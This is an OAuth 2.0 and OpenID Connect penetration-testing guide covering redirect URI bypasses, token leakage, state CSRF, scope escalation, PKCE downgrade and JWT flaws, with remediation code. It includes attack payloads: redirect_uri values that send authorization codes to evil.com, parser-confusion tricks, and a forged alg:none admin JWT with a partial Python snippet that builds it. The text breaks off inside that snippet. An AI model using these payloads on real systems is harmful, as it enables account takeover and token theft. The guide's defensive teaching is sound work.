TL;DR: OAuth 2.0 and OpenID Connect power authentication and authorization for the majority of modern web applications, but their flexibility creates a massive attack surface when implementations deviate from security best practices. In our penetration testing engagements, we routinely find redirect URI bypasses, missing PKCE, token leakage through referrer headers and browser history, JWT validation failures including the alg:none attack, state parameter omissions enabling CSRF, scope escalation through parameter tampering, and insecure token storage in localStorage. This guide walks through every major OAuth/OIDC vulnerability class we encounter, explains the attack mechanics in detail, provides real-world examples from production applications, and gives concrete remediation guidance for each issue.
Why OAuth 2.0 and OpenID Connect Are Everywhere -- And Why They Are So Frequently Misconfigured
OAuth 2.0 has become the de facto standard for delegated authorization on the web. Published as RFC 6749 in 2012, it replaced a patchwork of proprietary authentication schemes with a single framework that allows users to grant third-party applications limited access to their resources without sharing credentials. OpenID Connect (OIDC), built as an identity layer on top of OAuth 2.0 and finalized in 2014, extended the framework to handle authentication as well, giving applications a standardized way to verify user identity and obtain basic profile information through ID tokens.
The adoption numbers are staggering. Every major identity provider -- Google, Microsoft Entra ID (formerly Azure AD), Okta, Auth0, AWS Cognito, Keycloak, PingIdentity -- implements OAuth 2.0 and OIDC. If your application supports "Sign in with Google" or "Sign in with Microsoft," you are using OIDC. If your API accepts bearer tokens, you are almost certainly using OAuth 2.0. If your mobile application authenticates against a backend API, the authorization code flow with PKCE is the recommended mechanism. SaaS platforms, fintech applications, healthcare portals, e-commerce sites, and internal enterprise tools all rely on these protocols for their core authentication and authorization mechanisms.
The problem is that OAuth 2.0 is a framework, not a protocol in the rigid sense. RFC 6749 deliberately leaves many implementation decisions to developers. It defines multiple grant types (authorization code, implicit, client credentials, resource owner password credentials), allows for extension grants, leaves redirect URI validation rules somewhat flexible, and does not mandate specific token formats. OIDC adds structure with JWTs and discovery endpoints, but it too allows significant implementation flexibility. This flexibility is what made OAuth 2.0 successful -- it can be adapted to web applications, mobile apps, single-page applications, IoT devices, and server-to-server communication. It is also what makes it dangerous.
When we conduct web application penetration tests, we find OAuth/OIDC misconfigurations in a significant majority of applications that implement these protocols. The reasons are consistent across engagements:
- Developers implement OAuth without fully understanding the security model. Many development teams follow quickstart guides or copy-paste configuration from Stack Overflow without understanding why each parameter exists. The state parameter looks optional. PKCE seems like unnecessary complexity. Redirect URI validation "works" with a simple string prefix match. These shortcuts create vulnerabilities.
- OAuth libraries and SDKs have secure defaults, but developers override them. Well-maintained libraries like passport.js, spring-security-oauth2, and oauthlib implement security best practices by default. But developers frequently customize behavior -- adding redirect URIs dynamically, disabling state validation for "simpler" flows, or storing tokens in localStorage for convenience.
- Identity providers allow insecure configurations. Many identity providers still support the implicit flow by default, allow wildcard redirect URIs, do not enforce PKCE, and accept response_type=token without warning. The provider's default configuration is often not the secure configuration.
- The OAuth 2.0 threat model has evolved. The original RFC 6749 threat model did not anticipate many modern attack vectors. Open redirect chains, browser-based token theft through XSS, and sophisticated phishing campaigns that abuse legitimate OAuth flows were not fully addressed until RFC 9700 (OAuth 2.0 Security Best Current Practice) was published. Many applications were built before these updated recommendations existed, and they have not been updated since.
- Microservice architectures multiply the attack surface. In a monolithic application, there might be one OAuth integration point. In a microservice architecture, every service might validate tokens independently, each with its own configuration and potential for error. A JWT validation flaw in a single microservice can compromise the entire system.
The consequence is that OAuth/OIDC vulnerabilities are not theoretical. They are practical, exploitable, and present in production applications right now. In this guide, we walk through every major vulnerability class we encounter in real penetration testing assessments, explain the attack mechanics, provide concrete exploitation techniques, and detail how to fix each issue.
Authorization Code Flow vs. Implicit Flow: A Security Analysis
Understanding the security properties of different OAuth 2.0 grant types is foundational to understanding why certain vulnerabilities exist. The two flows most relevant to web applications -- the authorization code flow and the implicit flow -- have fundamentally different security characteristics.
The Authorization Code Flow
The authorization code flow is the recommended grant type for server-side web applications and, when combined with PKCE, for single-page applications and mobile apps. The flow operates in two phases:
Phase 1 -- Authorization Request: The client application redirects the user's browser to the authorization server's /authorize endpoint with parameters including response_type=code, client_id, redirect_uri, scope, and state. The user authenticates with the authorization server and grants consent. The authorization server redirects the user back to the client's redirect_uri with a short-lived authorization code in the query string.
Phase 2 -- Token Exchange: The client application makes a back-channel (server-to-server) HTTP POST request to the authorization server's /token endpoint, presenting the authorization code along with its client_id and client_secret. The authorization server validates the code and credentials, then returns an access token (and optionally a refresh token and ID token) in the HTTP response body.
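Under the hood, Phase 2 is a plain form-encoded POST. A minimal Python sketch of building that request (the endpoint, client ID, and secret are hypothetical placeholders; the actual send happens server-to-server over TLS, never from the browser):

```python
import urllib.parse

TOKEN_ENDPOINT = "https://auth.example.com/token"  # hypothetical provider endpoint

def build_token_request(code, client_id, client_secret, redirect_uri):
    """Return the endpoint and form-encoded body for the back-channel
    code exchange. Send it server-to-server (e.g. with urllib.request
    or an HTTP client library); the browser never sees the response."""
    body = urllib.parse.urlencode({
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,    # must exactly match Phase 1
        "client_id": client_id,
        "client_secret": client_secret,  # confidential clients only
    })
    return TOKEN_ENDPOINT, body

endpoint, body = build_token_request(
    "abc123", "my-client", "s3cret", "https://app.example.com/callback")
```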
The security properties of this flow are significant. The access token is never exposed to the user's browser. It travels only over the back-channel between the client server and the authorization server. The authorization code is exposed in the browser's URL bar and potentially in server logs, but it is short-lived (typically 30-60 seconds), single-use, and cannot be exchanged for tokens without the client secret. An attacker who intercepts the authorization code through a referrer header or browser history still cannot obtain tokens without also compromising the client secret.
The Implicit Flow
The implicit flow was designed for browser-based applications (single-page applications) that could not securely store a client secret. Instead of returning an authorization code, the authorization server returns the access token directly in the URL fragment (#access_token=...) of the redirect URI. There is no back-channel token exchange.
The security problems with this approach are severe:
- Token exposure in browser history. The access token appears in the URL fragment. While fragments are not sent to servers in HTTP requests, they are stored in the browser's history. Any user of the same browser, or any browser extension with history access, can retrieve the token.
- Token exposure via referrer headers. If the page that receives the token contains any external resources (images, scripts, analytics tags), the full URL including the fragment may be sent in the Referer header to third-party servers. Although RFC 7231 states that fragments should not be included in the Referer header, some browsers and proxy configurations do not strip them correctly, and JavaScript on the page can access window.location.hash and transmit it to any server.
- No client authentication. Since there is no back-channel exchange, the authorization server cannot verify that the token is being delivered to the legitimate client. An attacker who tricks the user into authorizing a malicious application can receive the token directly.
- No token binding. The implicit flow provides no mechanism to bind the token to the specific client instance that initiated the request. Tokens can be replayed from any context.
- Token substitution attacks. An attacker can inject a stolen token into a legitimate client's flow, impersonating the victim. Without a back-channel exchange that includes client credentials, the client has no way to verify the token's provenance.
RFC 9700 (OAuth 2.0 Security Best Current Practice) explicitly states: "The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay." The recommendation is clear: do not use the implicit flow. Use the authorization code flow with PKCE instead, even for single-page applications.
What we find in practice: Despite the implicit flow being formally deprecated for years, we still encounter it in approximately 20-30% of penetration testing engagements involving OAuth. The most common scenarios are legacy single-page applications built before PKCE adoption, applications using older versions of identity provider SDKs that default to the implicit flow, and applications where developers chose response_type=token because it required fewer steps to implement. Many identity providers (including some enterprise Entra ID configurations) still allow the implicit flow to be enabled with a single checkbox.
The Hybrid Flow
OIDC also defines hybrid flows that combine elements of both the authorization code and implicit flows. For example, response_type=code token returns both an authorization code and an access token in the front channel. While the authorization code can still be exchanged securely on the back channel, the access token exposed in the front channel suffers from all the same vulnerabilities as the implicit flow. Hybrid flows should be used with extreme caution, and in most cases, the pure authorization code flow with PKCE is preferable.
Redirect URI Validation Bypass Techniques
Redirect URI validation is the single most critical security control in the OAuth 2.0 authorization flow. When a user completes authentication, the authorization server redirects their browser back to the client application's redirect_uri along with an authorization code or token. If an attacker can manipulate the redirect_uri to point to a server they control, they receive the authorization code or token instead of the legitimate client.
RFC 6749 requires that the authorization server validate the redirect URI against pre-registered values. However, the specification allows for both exact match and partial match validation, and many implementations get this wrong. Here are the bypass techniques we use in penetration tests, ordered by frequency of success:
Subdomain Matching Bypass
Many authorization servers validate the redirect URI by checking if it matches the registered domain. If the registered redirect URI is https://app.example.com/callback, the server might accept any subdomain of example.com. An attacker who controls https://evil.example.com (perhaps through a subdomain takeover or a compromised subdomain) can set redirect_uri=https://evil.example.com/callback and receive the authorization code.
In practice, subdomain takeovers are extremely common. Organizations frequently have dangling DNS records pointing to deprovisioned cloud resources (AWS Elastic Beanstalk, Azure App Service, Heroku, GitHub Pages). If the CNAME record still exists but the resource has been deleted, an attacker can claim that resource and receive traffic for the subdomain. When combined with a loose redirect URI validation, this becomes a direct path to account takeover.
Path Traversal and Open Redirect Chains
If the authorization server validates only the scheme, host, and port of the redirect URI but allows arbitrary paths, an attacker can abuse open redirect vulnerabilities on the legitimate domain. Consider a registered redirect URI of https://app.example.com/oauth/callback. If the application has an open redirect at https://app.example.com/goto?url=https://evil.com, the attacker can set:
redirect_uri=https://app.example.com/goto?url=https://evil.com
The authorization server sees that the redirect URI is on app.example.com and accepts it. The user's browser follows the redirect to app.example.com/goto, which then redirects to evil.com with the authorization code or token in the URL. This is one of the most reliable bypass techniques because open redirect vulnerabilities are extremely common, and many security teams classify them as low-severity issues that do not warrant immediate remediation.
URL Parsing Inconsistencies
Different URL parsers handle edge cases differently, and these inconsistencies can be exploited to bypass redirect URI validation. Common techniques include:
- Userinfo component: The URL https://app.example.com@evil.com/callback might be parsed differently by the authorization server (which sees the host as app.example.com) and the browser (which sees the host as evil.com with app.example.com as the userinfo component).
- Backslash confusion: Some parsers treat backslashes as path separators while others treat them as part of the hostname. The URL https://app.example.com\@evil.com may bypass validation on some servers.
- Unicode normalization: Characters like the Unicode full-width solidus (%EF%BC%8F) or other Unicode characters that normalize to / or . can confuse validation logic.
- Fragment injection: Adding a fragment (#) to the redirect URI can cause the authorization code to be appended after the fragment, making it accessible only to JavaScript on the page rather than being sent to the server. This can be combined with XSS on the target page.
- Null byte injection: In some implementations, a null byte (%00) can truncate the URL during validation but not during the actual redirect, allowing the attacker to append a malicious domain after the null byte.
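The userinfo ambiguity is easy to reproduce with Python's standard URL parser. This sketch (domains are illustrative) contrasts a flawed prefix check with exact matching against the registered value:

```python
# Why naive string checks on redirect_uri fail: a userinfo-style URL
# passes a prefix check while the browser navigates to the attacker's host.
from urllib.parse import urlparse

REGISTERED = "https://app.example.com/callback"

def naive_check(redirect_uri):
    # Flawed: prefix matching instead of exact matching.
    return redirect_uri.startswith("https://app.example.com")

def strict_check(redirect_uri):
    # Exact match against the registered value, as RFC 9700 recommends.
    return redirect_uri == REGISTERED

evil = "https://app.example.com@evil.com/callback"
print(naive_check(evil))        # True -- validation bypassed
print(urlparse(evil).hostname)  # evil.com -- where the browser actually goes
print(strict_check(evil))       # False -- exact match blocks it
```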
Wildcard and Prefix Matching
Some identity providers allow wildcard patterns in redirect URI registrations. A registration like https://app.example.com/* or even https://*.example.com/callback gives attackers significant flexibility. Even without explicit wildcards, many authorization servers implement prefix matching, accepting any URL that begins with the registered redirect URI. If the registered URI is https://app.example.com/callback, the server might accept https://app.example.com/callback.evil.com or https://app.example.com/callback/../../../evil-path.
Localhost and Custom Scheme Bypasses
For mobile applications and desktop applications, OAuth 2.0 allows redirect URIs using custom URI schemes (e.g., myapp://callback) or http://localhost with a dynamic port. If the authorization server accepts http://localhost as a valid redirect URI for a web application, an attacker running a local HTTP server on the victim's machine (through malware or a compromised browser extension) can intercept the authorization code. Similarly, custom URI schemes on mobile platforms can be claimed by malicious applications through scheme hijacking on Android or through similar techniques on other platforms.
Pentester's note: When testing redirect URI validation, we always start by modifying the redirect_uri parameter systematically: changing the path, adding subdomains, injecting URL-encoded characters, testing with and without trailing slashes, adding query parameters, inserting fragments, and testing every URL parsing edge case. We also enumerate all open redirects on the application domain, as these are frequently the easiest path to a redirect URI bypass. Tools like Burp Suite's Collaborator can confirm out-of-band that redirected requests are reaching an attacker-controlled server.
Token Leakage via Referrer Headers, Browser History, and Logs
Even when the OAuth flow itself is implemented correctly, tokens and authorization codes can leak through side channels. Token leakage is a category of vulnerability where sensitive OAuth artifacts end up in locations accessible to attackers, often without any direct exploitation of the OAuth implementation itself.
Referrer Header Leakage
When the authorization server redirects the user back to the client application with an authorization code in the query string (e.g., https://app.example.com/callback?code=abc123&state=xyz), the full URL is stored in the browser as the current page's URL. If that callback page loads any external resources -- third-party JavaScript, analytics scripts, tracking pixels, social media widgets, or even a single image hosted on a CDN -- the browser sends the full URL in the Referer header to the server hosting that resource.
This means the authorization code is sent to every third-party server referenced by the callback page. If any of those third-party services are compromised, or if the third party logs referrer headers (which most analytics services do), the authorization code is available to the third party. If the authorization code has not yet been exchanged for tokens and has not expired, the third party can exchange it themselves.
The same issue affects the implicit flow even more severely. When the access token is in the URL fragment, it is accessible to any JavaScript on the page. While the fragment is not normally sent in the Referer header, any script on the callback page can read window.location.hash and transmit the token to an external server. If the callback page includes a compromised third-party script (a supply chain attack), the access token is immediately exfiltrated.
The mitigation for referrer leakage is straightforward: set the Referrer-Policy header to no-referrer or strict-origin on the callback page, and minimize external resources loaded on that page. Better yet, use the response_mode=form_post parameter, which causes the authorization server to deliver the authorization code via an HTTP POST to the callback URL rather than as a query parameter in a redirect. POST body parameters are never included in referrer headers.
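As a sketch of the header-based mitigation, here is a framework-agnostic WSGI callback handler that sets Referrer-Policy; in Flask or Django you would set the same headers on the callback response:

```python
# Minimal WSGI sketch of an OAuth callback response whose code-bearing
# URL is never leaked to third-party servers via the Referer header.
def oauth_callback(environ, start_response):
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # Never send this page's URL (which contains ?code=...) as a
        # Referer to any resource it links to:
        ("Referrer-Policy", "no-referrer"),
        ("Cache-Control", "no-store"),  # keep the code out of caches too
    ]
    start_response("200 OK", headers)
    return [b"Signing you in..."]
```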
Browser History Leakage
Every redirect in the OAuth flow creates an entry in the browser's history. The authorization code (in the query string) and tokens (in the URL fragment for implicit flows) are preserved in this history. On shared computers, kiosk terminals, or any device where multiple users access the same browser profile, this history is accessible to subsequent users. Even on personal devices, browser history is often synced across devices through browser profile synchronization (Chrome Sync, Firefox Sync, Safari iCloud), potentially exposing tokens on devices with weaker security controls.
After successfully exchanging the authorization code, the client application should immediately redirect the user to a clean URL (without the code in the query string) using history.replaceState() or a server-side redirect. This removes the authorization code from the browser's history and address bar. We frequently find that applications skip this step, leaving valid (or recently valid) authorization codes in the browser history indefinitely.
Server Log Leakage
Web server access logs typically record the full URL of every request, including query string parameters. If authorization codes are delivered via query string (the default for the authorization code flow), they are recorded in the web server logs of the client application. These logs are often stored in plaintext, retained for extended periods, accessible to operations and development teams, and may be shipped to centralized logging services (Splunk, ELK Stack, Datadog) where they are retained and indexed.
In one engagement, we found authorization codes stored in an Elasticsearch cluster that was accessible without authentication from the internal network. The codes were single-use and short-lived, so direct exploitation was not possible. However, the logging infrastructure also captured the full HTTP request including the Authorization: Bearer header for subsequent API calls. The access tokens in those logs were long-lived (24 hours) and could be replayed directly. This is a common pattern: even if the OAuth flow is secure, the tokens are only as secure as the infrastructure that handles them after issuance.
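A log-scrubbing filter is one practical mitigation for this pattern. The Python sketch below redacts authorization codes and bearer tokens before log lines are written; the regex patterns are illustrative and should be extended for your own parameter and header names:

```python
# Logging filter that redacts OAuth artifacts before they reach access
# logs or a centralized pipeline (Splunk, ELK, Datadog, ...).
import logging
import re

REDACTIONS = [
    # ?code=... or &code=... query parameters
    (re.compile(r"([?&]code=)[^&\s]+"), r"\1REDACTED"),
    # Authorization: Bearer <token> headers captured in request logs
    (re.compile(r"(Authorization:\s*Bearer\s+)\S+", re.IGNORECASE), r"\1REDACTED"),
]

class TokenRedactingFilter(logging.Filter):
    def filter(self, record):
        msg = record.getMessage()
        for pattern, repl in REDACTIONS:
            msg = pattern.sub(repl, msg)
        record.msg, record.args = msg, None  # replace with the scrubbed text
        return True  # keep the (redacted) record
```

Attach the filter to every handler that can see request URLs, not just the application logger, so codes never reach disk in the first place.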
Error Page Leakage
When the OAuth callback encounters an error, many applications display a debug error page that includes the request parameters -- including the authorization code. If these error pages are served in production (a common misconfiguration), the authorization code is displayed in the page source and may be cached by CDNs, proxies, or search engine crawlers. We have also seen authorization codes leaked through stack traces in error reporting services like Sentry and Bugsnag, where the full request URL is captured as part of the error context.
State Parameter CSRF Attacks
The state parameter in OAuth 2.0 serves as a CSRF protection mechanism. Without it, an attacker can force a victim to complete an OAuth flow that links the victim's account to the attacker's identity provider account, or that authenticates the victim into the attacker's account on the client application.
How the Attack Works
The attack exploits the fact that the OAuth authorization flow involves a redirect from the client application to the authorization server and back. An attacker can initiate an OAuth flow, authenticate with their own credentials, receive an authorization code, and then trick the victim into completing the flow by visiting the callback URL with the attacker's authorization code.
Here is the step-by-step attack for a login CSRF scenario:
- The attacker initiates the OAuth login flow on the target application.
- The attacker authenticates with their own credentials at the identity provider.
- The identity provider redirects the attacker's browser to the callback URL: https://app.example.com/callback?code=ATTACKER_CODE.
- The attacker intercepts this redirect (using a proxy or by pausing the flow) and does not complete it.
- The attacker sends the callback URL to the victim (via email, chat, or embedding it in a web page as an image tag or iframe).
- The victim's browser follows the URL, and the target application exchanges the authorization code for tokens -- tokens associated with the attacker's account.
- The victim is now logged into the application as the attacker. Any data the victim enters (personal information, payment details, documents) is accessible to the attacker.
This is known as "login CSRF" and is more common than many developers realize. The impact depends on the application: in a note-taking application, the attacker sees everything the victim writes. In a financial application, the victim might link their bank account to the attacker's session. In a cloud storage application, the victim uploads sensitive files to the attacker's account.
Account Linking CSRF
A more dangerous variant occurs when an application allows linking multiple identity providers to a single account (e.g., "Connect your Google account" or "Link your GitHub account"). If the linking flow does not verify the state parameter, an attacker can force the victim to link the attacker's identity provider account to the victim's application account. After the link is complete, the attacker can log in as the victim using their own identity provider credentials.
We find this vulnerability frequently in applications that allow social login connections. The "connect" flow is often implemented as an afterthought, with less rigorous security review than the primary login flow.
Proper State Parameter Implementation
The state parameter must be:
- Unpredictable: Generated using a cryptographically secure random number generator. A minimum of 128 bits of entropy is recommended.
- Bound to the user's session: The state value must be stored in the user's session (server-side) or in an HTTP-only, secure cookie before the authorization request. When the callback is received, the application must verify that the state parameter matches the stored value.
- Single-use: Each state value should be used only once. After validation, it should be deleted from the session to prevent replay.
- Present on every flow: The state parameter must be included in every authorization request, not just login flows. Account linking, permission re-authorization, and scope upgrade flows all require state parameter protection.
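The requirements above can be sketched in a few lines of Python; the session dict here stands in for your framework's server-side session store:

```python
# State parameter generation and validation: unpredictable, bound to
# the session, single-use, compared in constant time.
import hmac
import secrets

def issue_state(session):
    """Generate a fresh state value before the authorization request."""
    state = secrets.token_urlsafe(32)  # 256 bits of CSPRNG entropy
    session["oauth_state"] = state     # bound to this user's session
    return state                       # include as &state=... in the request

def validate_state(session, returned_state):
    """Check the callback's state against the stored value."""
    expected = session.pop("oauth_state", None)  # single-use: always remove
    if expected is None:
        return False
    return hmac.compare_digest(expected, returned_state)
```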
What we find in practice: The most common state parameter issues we encounter are: (1) the state parameter is omitted entirely, (2) the state parameter is present but not validated on the callback, (3) the state parameter is a predictable value like the user's session ID or a sequential counter, (4) the state parameter is validated but not bound to the session (stored in localStorage where it can be overwritten by the attacker through XSS), and (5) the state parameter is correctly implemented for the login flow but missing from account linking or re-authorization flows.
Scope Escalation and Consent Screen Bypass
OAuth 2.0 scopes define the level of access that a client application requests. When a user authorizes an application, the consent screen displays the requested scopes (e.g., "This application wants to read your email" or "This application wants to manage your repositories"). The user can then make an informed decision about whether to grant access. Scope escalation attacks attempt to obtain broader access than the user intended to grant.
Scope Parameter Tampering
The most straightforward scope escalation attack involves modifying the scope parameter in the authorization request. If a legitimate application requests scope=email profile, an attacker who controls the authorization request (through a man-in-the-middle position, XSS, or by directly crafting a malicious link) can change it to scope=email profile admin or scope=email profile https://www.googleapis.com/auth/admin.directory.user.
Whether this works depends on the authorization server's behavior. Well-configured authorization servers will display the elevated scope on the consent screen, giving the user an opportunity to reject the request. However, several scenarios bypass this protection:
- Pre-approved scopes: If the user has previously approved a scope for a given application, many authorization servers do not show the consent screen again for that scope, even if additional scopes are added. An attacker who adds scopes incrementally can escalate access without ever triggering a consent prompt for the elevated scope.
- Organizational consent: In enterprise identity providers like Microsoft Entra ID, an administrator can grant "admin consent" for an application, pre-approving all requested scopes for all users in the organization. If admin consent has been granted, scope escalation occurs silently.
- Dynamic scope registration: Some identity providers allow applications to register new scopes at runtime. If the application's client registration endpoint is not properly secured, an attacker can register additional scopes and then request them.
- Scope aliasing and inheritance: Some authorization servers implement scope hierarchies where a broad scope implicitly includes narrower scopes. Requesting scope=admin might silently include read, write, and delete without displaying each one individually on the consent screen.
Consent Screen Bypass
Some OAuth implementations allow bypassing the consent screen entirely under certain conditions:
- The prompt=none parameter: OIDC defines the prompt parameter to control the authorization server's behavior. prompt=none requests silent authentication -- if the user is already authenticated and has previously consented, the authorization server redirects directly to the callback with an authorization code, without showing any UI. If a first-party application is configured as "trusted" and always receives silent consent, scope escalation via parameter tampering becomes completely invisible.
- First-party application trust: Many authorization servers allow marking certain applications as "first-party" or "trusted," which skips the consent screen entirely. If an attacker can register a malicious application with the same client_id as a trusted application (through a registration flaw), or if the trusted application has an open redirect that can be chained with a redirect URI bypass, consent is never shown.
- The approval_prompt=auto parameter: Google's OAuth implementation historically used this parameter (now deprecated in favor of prompt). When set to auto, consent was shown only if the user had not previously approved the exact set of scopes. This allowed incremental scope escalation: request one new scope at a time, and the consent screen only mentions the single new scope, not the cumulative access being granted.
Token Scope Verification Failures
Even when scopes are properly requested and consented, the resource server (API) must verify that the access token's scope is sufficient for the requested operation. In many implementations, the resource server does not validate scopes at all -- any valid access token is accepted for any API endpoint, regardless of the scopes it was granted. This effectively makes scopes a cosmetic feature rather than a security control.
In one engagement, we obtained an access token with scope=read and successfully used it to call write and delete API endpoints because the API gateway only verified the token's signature and expiration, not its scope claims. This is particularly common in microservice architectures where each service validates the JWT independently but only checks the signature, not the payload claims.
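The fix is a per-endpoint scope check at the resource server. A minimal sketch, assuming the JWT signature and expiration have already been verified and claims is the decoded payload:

```python
# Scope enforcement: signature validity alone is not authorization.
def require_scope(claims, required):
    """Return True only if the token's scope claim grants `required`.
    Per RFC 6749, "scope" is a space-delimited string of scope tokens."""
    granted = set(claims.get("scope", "").split())
    return required in granted

claims = {"sub": "user123", "scope": "read profile"}
require_scope(claims, "read")    # True  -- allow the request
require_scope(claims, "delete")  # False -- reject with HTTP 403
```

In a microservice architecture, this check belongs in every service (or in shared middleware), not only at the API gateway.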
PKCE: What It Solves and When It Is Missing
Proof Key for Code Exchange (PKCE, pronounced "pixie") was introduced in RFC 7636 to address a specific vulnerability in the authorization code flow: authorization code interception. While the authorization code flow is more secure than the implicit flow because the access token is exchanged on the back channel, the authorization code itself is still delivered through the front channel (the user's browser) and can be intercepted.
The Authorization Code Interception Problem
In the standard authorization code flow without PKCE, the security of the flow relies on two factors: possession of the authorization code and possession of the client secret. For confidential clients (server-side applications), the client secret is stored securely on the server, and an attacker who intercepts the authorization code cannot exchange it without the secret.
But for public clients -- mobile applications, single-page applications, desktop applications -- there is no client secret. The application's source code is accessible to the user (and therefore to attackers), so any embedded secret can be extracted. Without a client secret, the only thing preventing an attacker from exchanging a stolen authorization code is the code itself.
Authorization code interception can happen in several ways:
- Custom URI scheme hijacking on mobile: On Android, any application can register to handle a custom URI scheme. If the legitimate application uses myapp://callback as its redirect URI, a malicious application can register the same scheme and intercept the redirect containing the authorization code.
- Referrer header leakage: As discussed earlier, the authorization code in the query string can leak through referrer headers to third-party servers.
- Browser history and log access: The authorization code is visible in browser history and server logs.
- Network-level interception: On non-HTTPS connections (which should never be used but occasionally are), the authorization code can be intercepted by network attackers.
How PKCE Works
PKCE adds a proof-of-possession mechanism to the authorization code flow. The process works as follows:
- The client generates a cryptographically random string called the code_verifier (between 43 and 128 characters from the unreserved character set).
- The client computes the code_challenge by applying a SHA-256 hash to the code_verifier and Base64URL-encoding the result. (The plain method -- where the challenge equals the verifier -- is also defined but provides weaker security.)
- The client includes the code_challenge and code_challenge_method=S256 in the authorization request.
- The authorization server stores the code_challenge associated with the authorization code it issues.
- When the client exchanges the authorization code for tokens, it includes the original code_verifier in the token request.
- The authorization server hashes the received code_verifier, compares it to the stored code_challenge, and only issues tokens if they match.
The key insight is that the code_challenge is sent in the authorization request (which is public), but the code_verifier is sent only in the token exchange request (which is direct from client to server). An attacker who intercepts the authorization code does not have the code_verifier and cannot compute it from the code_challenge (because SHA-256 is a one-way function). Therefore, the intercepted authorization code is useless.
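Both sides of the exchange fit in a few lines of standard-library Python. This is a sketch, not a production implementation; the function names are illustrative, and `secrets.token_urlsafe(32)` happens to yield a 43-character verifier, the RFC 7636 minimum:

```python
import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    # code_verifier: 43-128 chars from the unreserved set; token_urlsafe(32)
    # produces 43 URL-safe characters.
    verifier = secrets.token_urlsafe(32)
    # code_challenge: BASE64URL(SHA-256(verifier)) with padding stripped (S256)
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    return verifier, challenge

def server_verifies(stored_challenge: str, presented_verifier: str) -> bool:
    # The authorization server recomputes the challenge from the presented
    # verifier and compares it to the one stored with the authorization code.
    digest = hashlib.sha256(presented_verifier.encode("ascii")).digest()
    computed = base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    return secrets.compare_digest(computed, stored_challenge)

verifier, challenge = make_pkce_pair()
assert server_verifies(challenge, verifier)          # legitimate client
assert not server_verifies(challenge, "a-stolen-code-is-not-enough")
```

Note the constant-time comparison: even though the challenge is public, comparing with `secrets.compare_digest` is a cheap habit that avoids timing side channels elsewhere.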
When PKCE Is Missing
Despite being recommended for all clients (including confidential clients) since RFC 9700, PKCE adoption remains incomplete. In our assessments, we find PKCE missing in the following scenarios:
- Server-side applications relying solely on client secrets: Many developers believe that PKCE is only necessary for public clients. While the client secret does protect against basic code interception, PKCE provides defense-in-depth. If the client secret is leaked (through a configuration file in a public repository, a server-side vulnerability, or an insider threat), PKCE prevents authorization code interception even without the secret.
- Legacy identity provider configurations: Older OAuth implementations (especially those predating RFC 7636) do not support PKCE. Some organizations still use these systems and have not upgraded.
- Mobile applications using web views: Some mobile applications implement OAuth through embedded web views rather than the system browser. These implementations often skip PKCE because the developer assumes the web view is a controlled environment. In reality, embedded web views have weaker security isolation than the system browser and are more susceptible to code interception.
- PKCE downgrade attacks: Some authorization servers accept PKCE but do not require it. An attacker who initiates the OAuth flow (perhaps through a CSRF attack) can simply omit the code_challenge parameter, and the server will issue an authorization code that can be exchanged without a code_verifier. The authorization server should be configured to require PKCE for all flows.
Critical finding: The PKCE downgrade attack is one of the most underappreciated OAuth vulnerabilities. We have encountered multiple identity providers where PKCE is "supported" but not "enforced." In these configurations, PKCE provides no security benefit because an attacker can simply strip the PKCE parameters from the authorization request. Always verify that the authorization server is configured to require PKCE, not merely accept it.
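Enforcement on the authorization server amounts to rejecting any request that omits or weakens PKCE rather than falling back to the non-PKCE flow. A hedged sketch (the guard function and error handling are illustrative; the parameter names follow RFC 7636):

```python
# Hypothetical authorization-endpoint guard. Parameter names are from
# RFC 7636; the validation function itself is an illustrative sketch.

def check_pkce_required(params: dict) -> None:
    if "code_challenge" not in params:
        # Absent PKCE parameters = downgrade attempt; reject, never fall back
        raise ValueError("code_challenge is required")
    if params.get("code_challenge_method", "plain") != "S256":
        # RFC 7636 defaults the method to "plain" when omitted; accept only S256
        raise ValueError("only the S256 challenge method is accepted")

# A compliant request passes:
check_pkce_required({"code_challenge": "abc", "code_challenge_method": "S256"})

# A request with PKCE stripped by an attacker is rejected:
try:
    check_pkce_required({"response_type": "code"})
    stripped_rejected = False
except ValueError:
    stripped_rejected = True
assert stripped_rejected
```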
JWT Validation Failures: alg:none, Key Confusion, and Signature Stripping
JSON Web Tokens (JWTs) are the standard token format for OpenID Connect ID tokens and are widely used for OAuth 2.0 access tokens. A JWT consists of three Base64URL-encoded parts separated by periods: the header (specifying the algorithm and token type), the payload (containing claims like issuer, subject, audience, and expiration), and the signature. The security of JWTs depends entirely on proper signature validation. When validation is flawed, attackers can forge tokens and impersonate any user.
The alg:none Attack
The JWT specification (RFC 7519) defines an "unsecured JWT" where the algorithm in the header is set to "alg": "none" and the signature section is empty. This was intended for use cases where the JWT is transported over a secure channel and integrity is guaranteed by other means. In practice, this feature has been a source of critical vulnerabilities.
The attack is simple: take a valid JWT, decode the header, change the alg field to "none", modify the payload claims as desired (e.g., change the sub claim to an administrator's user ID), re-encode the header and payload, and remove the signature (leaving the trailing period). If the server accepts alg:none, the forged token is accepted as valid.
# Original JWT header
{"alg": "RS256", "typ": "JWT"}
# Modified header
{"alg": "none", "typ": "JWT"}
# Forged token (note the empty signature after the trailing period)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxMjYyMDgwMH0.
This vulnerability was first widely publicized in 2015, when researcher Tim McLean, writing on Auth0's blog, disclosed that many JWT libraries, including the widely used jsonwebtoken (Node.js), PyJWT (Python), and ruby-jwt (Ruby), accepted alg:none by default. The affected libraries have since been patched, but custom JWT validation code, older library versions, and misconfigured validation settings continue to exhibit this vulnerability.
Variations of the alg:none attack include using different capitalizations ("None", "NONE", "nOnE") to bypass case-sensitive blocklists, and using URL-encoding or whitespace padding to evade signature checks.
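For clarity, here is how the forged token shown above is assembled. This stdlib-only sketch reproduces the attacker's side; the claims are the ones from the example, and `json.dumps` uses compact separators to match standard JWT encoding:

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded Base64URL
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

# Swap the header to alg:none, set the desired claims, drop the signature.
header = b64url(json.dumps({"alg": "none", "typ": "JWT"},
                           separators=(",", ":")).encode())
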